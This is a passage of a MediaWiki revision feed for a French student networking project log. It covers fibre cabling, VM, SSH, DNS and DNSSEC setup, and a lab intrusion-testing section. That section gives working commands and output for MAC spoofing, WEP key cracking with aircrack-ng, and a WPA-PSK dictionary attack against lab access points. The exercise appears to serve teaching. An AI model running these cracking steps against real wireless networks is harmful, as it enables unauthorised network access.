[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
Kjjlddelamuerto.space-ksk.key	   Kjjlddelamuerto.space-zsk.key&lt;br /&gt;
Kjjlddelamuerto.space-ksk.private  Kjjlddelamuerto.space-zsk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34991</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34991"/>
				<updated>2016-11-07T11:28:04Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
